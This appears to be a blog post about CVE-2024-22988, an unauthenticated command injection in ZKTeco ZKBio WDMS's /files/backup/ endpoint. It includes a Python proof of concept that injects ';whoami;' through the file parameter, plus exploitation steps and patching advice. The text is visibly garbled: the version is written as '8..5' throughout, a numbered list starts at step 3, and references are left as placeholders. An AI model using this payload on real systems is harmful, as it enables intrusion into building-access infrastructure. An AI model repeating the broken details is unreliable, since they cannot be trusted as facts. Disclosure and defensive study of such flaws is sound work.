CVE-2024-22988 - Remote Code Execution in ZKTeco ZKBio WDMS v8..5 via /files/backup/ Endpoint

In early 2024, a serious security flaw was discovered in ZKTeco ZKBio WDMS v8..5, a popular web-based device management system used to control biometric hardware. CVE-2024-22988 allows remote attackers to execute arbitrary code on the server through the /files/backup/ endpoint, which is supposed to handle backups but can be abused to run malicious commands.

This post explains how the vulnerability works, provides code snippets demonstrating the exploit, and links to original sources for further reading. If you manage ZKBio WDMS, patch immediately!

Version: 8..5

- Component: /files/backup/ endpoint

This endpoint is meant for backup operations. Tragically, it fails to sanitize user input, enabling command injection that leads directly to remote code execution (RCE).

How Does the CVE-2024-22988 Exploit Work?

The core issue is that input provided through the /files/backup/ endpoint is sent directly to system shell commands. If a user controls this input, they can inject extra commands. Since this route requires no authentication in v8..5, anyone can abuse it.

In simple terms:
An attacker sends a crafted HTTP request to /files/backup/ containing commands like ; whoami;. The vulnerable code stitches this input into a shell command and runs it, spilling out system info or worse—letting the attacker upload malware, open reverse shells, etc.

Code: Proof-of-Concept Exploit

Here’s a basic Python script to exploit the flaw. This example runs the whoami command on the target ZKBio WDMS server.

import requests

# Target ZKBio WDMS server
target = 'http://victim-server:8088';
# Vulnerable endpoint
url = f'{target}/files/backup/'

# Payload injects a shell command
payload = {
    'file': 'backup.zip;whoami;'  # Injects ";whoami;" into the shell command
}

response = requests.post(url, data=payload)

print("Server response:")
print(response.text)  # Output should contain the result of 'whoami'

Note:
In the PoC above, the file parameter is abused to smuggle in the shell metacharacter ;, followed by a command (whoami). The server’s insecure code throws this into a shell, which executes the injected command.

Find the vulnerable endpoint

- /files/backup/ is usually available without authentication on port 8088 (default).

Form data: file=backup.zip;whoami;

3. Send the request to /files/backup/.

Real-World Risk

ZKTeco ZKBio WDMS is widely used in physical security—think time clocks, card readers, entry points. Compromising WDMS could mean controlling access to entire facilities!

Upgrade to the latest version of ZKBio WDMS as soon as possible.

- Block remote access to /files/backup/ via firewall.

Monitor for suspicious log entries targeting this endpoint.

### Official Patch/Reference

- ZKTeco WDMS Support
- NVD: CVE-2024-22988
- SecurityFocus: CVE-2024-22988 *(placeholder, update with real BID as available)*

Original References

- https://nvd.nist.gov/vuln/detail/CVE-2024-22988
- https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2024-22988
- Exploit Database - ZKTeco ZKBio WDMS 8..5 Remote Code Execution *(link to be updated if applicable)*

Final Thoughts

CVE-2024-22988 shows how dangerous poor input validation can be. With just a simple payload, attackers can hijack a management system and—potentially—the physical world it controls. Always keep critical devices updated, and never expose sensitive endpoints like /files/backup/ to the open Internet.

Stay secure!

*(This post is for educational purposes only. Do not attempt exploitation on any system you don’t own.)*

Timeline

Published on: 02/23/2024 23:15:09 UTC
Last modified on: 08/01/2024 13:47:02 UTC